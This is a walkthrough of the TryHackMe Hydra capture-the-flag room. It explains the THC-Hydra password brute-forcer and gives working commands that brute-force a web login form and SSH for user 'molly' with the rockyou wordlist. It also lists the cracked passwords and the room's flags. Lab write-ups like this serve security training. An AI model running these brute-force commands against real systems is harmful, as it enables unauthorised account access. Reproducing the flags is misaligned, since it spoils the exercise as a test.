TryHackMe | Hydra | Walkthrough

 

What is Hydra?

Hydra (also known as THC-Hydra) is a fast, robust, and widely used online password brute-forcer. It automates login attempts across many services and protocols. Instead of manually typing every possible password, Hydra does it in milliseconds using wordlists.

Supported Protocols

Hydra supports a wide variety of services, including:

SSH, FTP, HTTP(S)-FORM, RDP, SMB, MySQL, PostgreSQL, VNC, Telnet, SNMP, and many more.

You can view the full list on Hydra’s official repository.

Why Should You Care?

This highlights why strong passwords matter:

  • Common passwords like admin, password123, or 123456 can easily be cracked.

  • Many devices (like CCTV cameras) come with default credentials like admin:admin.

  • If left unchanged, these devices become low-hanging fruit for attackers.

 Installing Hydra

If you’re using Kali Linux or the TryHackMe AttackBox, Hydra is already installed.

For other systems:

  • Debian/Ubuntu: sudo apt install hydra

  • Fedora: sudo dnf install hydra

  • Or download from the official GitHub repo

 Task Overview – TryHackMe Challenge

In this TryHackMe room, we’re given a machine to attack with two tasks:

  1. Brute force web login for user molly

  2. Brute force SSH login for the same user

Let’s break down each task step-by-step.

Task 1 — Brute Force Web Login (POST Method)

Step 1: Intercept the Request

  • Visit the login page in the browser.

  • Try any random credentials.

  • Use Burp Suite to intercept the POST request.

  • Identify the request format. Example:

POST /login
username=regan&password=wrongpassword

The server responds:

Your username or password is incorrect.

We’ll use this failure string in our Hydra command.

 Step 2: Hydra Command for Web Login

hydra -l molly -P /usr/share/wordlists/rockyou.txt MACHINE_IP http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -V

Breakdown:

  • -l molly → The username to test.

  • -P rockyou.txt → Wordlist with potential passwords.

  • http-post-form → Specifies we’re attacking a POST web form.

  • "/login:username=^USER^&password=^PASS^:failure message" → Format Hydra understands.

  • -V → Verbose mode to show each attempt.

Result

Eventually, Hydra cracks the password. You’ll see:

[80][http-post-form] host: MACHINE_IP login: molly password: butterfly

 Flag 1:

THM{b3autiful_butt3rfly}

Task 2 — Brute Force SSH Login

Hydra Command for SSH

hydra -l molly -P /usr/share/wordlists/rockyou.txt MACHINE_IP -t 4 ssh -V

Explanation:

  • ssh → Protocol to brute force.

  • -t 4 → Run 4 parallel threads to speed up cracking.

Result

Hydra eventually finds the right password:

[22][ssh] host: MACHINE_IP login: molly password: chocolate

 Flag 2:

THM{sw33t_ch0c0lat3}

 Disclaimer

This tutorial is for educational purposes only. Always have explicit permission before testing any system. Use your skills ethically.


Comments

Post a Comment

Popular Posts